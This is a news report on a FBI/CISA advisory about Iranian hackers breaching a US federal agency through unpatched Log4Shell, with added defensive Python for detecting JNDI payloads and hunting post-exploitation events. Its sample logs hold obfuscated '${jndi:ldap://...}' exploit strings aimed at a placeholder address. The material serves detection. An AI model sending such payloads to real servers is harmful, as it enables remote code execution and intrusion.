
Iranian hackers hacked into US federal agency using old vulnerability

In a joint advisory, the FBI and CISA reported that a hacker group compromised one of the Federal Civilian Executive Branch (FCEB) agencies after the agency failed to install a patch for Log4Shell, a vulnerability for which fixes had been available for nearly a year. Notably, back in April this year, the FBI warned about the importance of installing the updates that close such vulnerabilities.


CISA did not name the compromised FCEB agency; the FCEB includes organisations such as the Department of Homeland Security, the Treasury Department and the Federal Trade Commission. But some details of the incident have emerged.

CISA said it first noticed suspected malicious activity on the unnamed agency's network in April, when analysts were performing a retrospective analysis using the government's EINSTEIN intrusion detection system. The incident was then worked in detail over the summer, from May to July. The investigation revealed that the attackers had exploited Log4Shell (CVE-2021-44228), a critical remote code execution vulnerability in the ubiquitous open-source logging library Log4j that had been disclosed as a zero-day in December 2021.

The attackers exploited Log4Shell on an unpatched VMware Horizon server, which gave them a foothold on the agency's network with administrator- and SYSTEM-level privileges. They then installed XMRig, an open-source crypto-mining program that attackers commonly deploy on compromised machines; in this case it mined Monero (XMR). The miner was delivered to the agency's server as an archive named file.zip.
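A Log4Shell exploitation attempt shows up in request logs as a `${jndi:...}` lookup string, usually in a header or query parameter, and attackers routinely disguise it with URL encoding and nested Log4j lookups (`${${lower:J}ndi:...}`, `${${::-j}ndi:...}`) so that a plain search for `${jndi:` misses it. The following triage helper is an added example, not code from the CISA/FBI advisory or from the article; it undoes those two disguises before matching and runs over constructed access-log lines (the 203.0.113.0/24 addresses are a documentation range, not real infrastructure).

```python
import re
from urllib.parse import unquote

# Added example, not code from the CISA/FBI advisory or from the article.
# Triage helper for Log4Shell (CVE-2021-44228) exploitation attempts in
# request logs. It undoes the two tricks attackers use to slip past a naive
# search for "${jndi:": URL encoding and nested Log4j lookups such as
# ${${lower:J}ndi:...} or ${${::-j}ndi:...}, then reports the resolved payload.

# One Log4j lookup with no nested lookup inside it: ${prefix:value}.
# The prefix may be empty, which is what the "${::-j}" trick relies on.
_LOOKUP = re.compile(r"\$\{([A-Za-z0-9]*):([^${}]*)\}")

# The JNDI protocols the Log4j 2.x JndiLookup would actually dereference.
_JNDI = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|http)://[^}]*\}",
                   re.IGNORECASE)


def _resolve_one(m):
    """Evaluate a single innermost lookup the way Log4j would, as far as we
    can without a JVM: case transforms and ':-' default values. Anything
    else is left in place so it stays visible in the output."""
    prefix, value = m.group(1).lower(), m.group(2)
    if prefix == "lower":
        return value.lower()
    if prefix == "upper":
        return value.upper()
    if prefix == "jndi":
        return m.group(0)          # the payload itself; never rewrite it
    if ":-" in value:              # ${env:UNSET:-j} and ${::-j} both yield "j"
        return value.split(":-", 1)[1]
    return m.group(0)


def normalize(s, max_rounds=16):
    """Percent-decode (twice, for double encoding) and collapse nested
    lookups from the inside out until the string stops changing."""
    s = unquote(unquote(s))
    for _ in range(max_rounds):
        resolved = _LOOKUP.sub(_resolve_one, s)
        if resolved == s:
            break
        s = resolved
    return s


def find_jndi(line):
    """Return the resolved ${jndi:...} payload in a log line, or None."""
    m = _JNDI.search(normalize(line))
    return m.group(0) if m else None


def scan_log(lines):
    """Return [(line_index, payload)] for every line carrying a JNDI payload."""
    hits = []
    for i, line in enumerate(lines):
        payload = find_jndi(line)
        if payload:
            hits.append((i, payload))
    return hits


# Constructed access-log lines (not from any real incident). Lines 1-4 carry
# the same attack in four disguises; line 0 is ordinary traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2022:03:11:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Feb/2022:03:11:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Feb/2022:03:11:15 +0000] "GET /portal/?q=%24%7B%24%7Blower%3AJ%7Dndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fb%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Feb/2022:03:11:21 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/c}"',
    '10.0.0.9 - - [10/Feb/2022:03:11:30 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://203.0.113.10:1099/d}"',
]

if __name__ == "__main__":
    for idx, payload in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {payload}")
```

The normaliser only models the `lower`/`upper` transforms and the `:-` default-value syntax, which is what the common obfuscations rely on; Log4j has further lookups (`date`, `sys`, `ctx`) that a determined attacker can abuse, so treat a clean result as "no known pattern", not "no attack". A hit also only proves an attempt: whether it succeeded is answered by outbound LDAP/RMI connections from the Horizon host and by the post-exploitation artefacts described in the following paragraphs.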

Alongside the miner, the attackers ran Mimikatz, an open-source credential-dumping tool, to harvest credentials, and then created a new domain administrator account. Using that account, they disabled Windows Defender and deployed Ngrok reverse proxies on multiple hosts to preserve access.

CISA notes that the attackers' ultimate motive remains unclear. But it says that all organisations with affected VMware systems that did not promptly apply the Log4Shell patches or workarounds should assume they have already been compromised and should start hunting for malicious activity on their networks.
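The post-exploitation chain described above (a new account created and added to Domain Admins, Defender switched off, ngrok started) leaves a recognisable trail in Windows event logs, and that trail is what a hunt for "assume compromise" should look for first. The following is an added example, not code from the CISA/FBI advisory or from the article. The event records are a constructed, simplified normalisation (one dict per event); the event IDs and field names are the real ones from the Security log (4720 user created, 4728/4756 member added to a global/universal group, 4688 process created) and from the Microsoft-Windows-Windows Defender/Operational log (5001 real-time protection disabled). Host and account names are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple

# Added example, not code from the CISA/FBI advisory or from the article.
# Hunts normalised Windows event records for the post-exploitation chain the
# advisory describes. Record layout is a constructed simplification:
# {"ts", "host", "channel", "event_id", "fields": {EventData fields}}.


class Finding(NamedTuple):
    kind: str
    host: str
    ts: datetime
    detail: str


PRIVILEGED_GROUPS = {"domain admins", "enterprise admins"}
DEFENDER_CHANNEL = "Microsoft-Windows-Windows Defender/Operational"


def _account_name(member):
    """4728/4756 report the member as a DN ("CN=svc,CN=Users,DC=..."); reduce
    it to the plain account name. A bare sAMAccountName passes through."""
    return member.split(",")[0].split("=", 1)[-1]


def hunt(events, window=timedelta(hours=24)):
    """Walk the events in time order and emit one Finding per indicator."""
    findings = []
    created = {}   # account name (lower-cased) -> the 4720 event that created it
    for e in sorted(events, key=lambda ev: ev["ts"]):
        f, eid, chan = e["fields"], e["event_id"], e["channel"]
        if chan == "Security" and eid == 4720:
            created[f["TargetUserName"].lower()] = e
        elif chan == "Security" and eid in (4728, 4756) \
                and f["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            # Only a *freshly created* account landing in a privileged group
            # within the window is flagged; routine admin changes are not.
            member = _account_name(f["MemberName"])
            origin = created.get(member.lower())
            if origin and e["ts"] - origin["ts"] <= window:
                findings.append(Finding(
                    "new_domain_admin", e["host"], e["ts"],
                    f"{member} created by {origin['fields']['SubjectUserName']} "
                    f"and added to {f['TargetUserName']} by {f['SubjectUserName']}"))
        elif chan == DEFENDER_CHANNEL and eid == 5001:
            findings.append(Finding("defender_rtp_disabled", e["host"], e["ts"],
                                    "real-time protection disabled"))
        elif chan == "Security" and eid == 4688:
            # CommandLine is only populated when "Include command line in
            # process creation events" is enabled; the image path is always there.
            text = (f.get("NewProcessName", "") + " " + f.get("CommandLine", "")).lower()
            if "ngrok" in text:
                findings.append(Finding("ngrok_tunnel", e["host"], e["ts"], text.strip()))
    return findings


def triage(findings):
    """Host -> sorted, de-duplicated indicator kinds, for a quick first pass."""
    by_host = defaultdict(set)
    for fnd in findings:
        by_host[fnd.host].add(fnd.kind)
    return {host: sorted(kinds) for host, kinds in by_host.items()}


def _ev(ts, host, channel, event_id, **fields):
    return {"ts": ts, "host": host, "channel": channel,
            "event_id": event_id, "fields": fields}


# Constructed events (not from any real incident), modelled on the chain above.
T0 = datetime(2022, 2, 10, 3, 0, 0)
EVENTS = [
    _ev(T0, "HORIZON01", "Security", 4688,
        NewProcessName=r"C:\Windows\System32\cmd.exe", CommandLine="cmd.exe /c whoami"),
    _ev(T0 + timedelta(minutes=5), "DC01", "Security", 4720,
        TargetUserName="svc_backup2", SubjectUserName="adm.jdoe"),
    _ev(T0 + timedelta(minutes=6), "DC01", "Security", 4728,
        MemberName="CN=svc_backup2,CN=Users,DC=corp,DC=example",
        TargetUserName="Domain Admins", SubjectUserName="adm.jdoe"),
    _ev(T0 + timedelta(minutes=20), "HORIZON01", DEFENDER_CHANNEL, 5001),
    _ev(T0 + timedelta(minutes=25), "HORIZON01", "Security", 4688,
        NewProcessName=r"C:\ProgramData\ngrok.exe", CommandLine="ngrok.exe tcp 3389"),
    _ev(T0 + timedelta(minutes=40), "FILESRV02", "Security", 4688,
        NewProcessName=r"C:\Windows\System32\cmd.exe",
        CommandLine=r"cmd.exe /c C:\Users\Public\ngrok.exe tcp 3389"),
    # A legitimate account creation that never reaches a privileged group.
    _ev(T0 + timedelta(hours=2), "DC01", "Security", 4720,
        TargetUserName="intern01", SubjectUserName="hr.admin"),
]

if __name__ == "__main__":
    for fnd in hunt(EVENTS):
        print(f"{fnd.ts:%Y-%m-%d %H:%M} {fnd.host:10} {fnd.kind:22} {fnd.detail}")
    print(triage(hunt(EVENTS)))
```

Two practical points: the account-creation rule deliberately keys on the pairing of 4720 and 4728/4756 rather than on either event alone, because both are noisy on their own in a large domain; and the ngrok match is a name match only, so a renamed binary will not trip it, which is why the Defender-disable and new-admin indicators on the same host matter more than any single process name.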
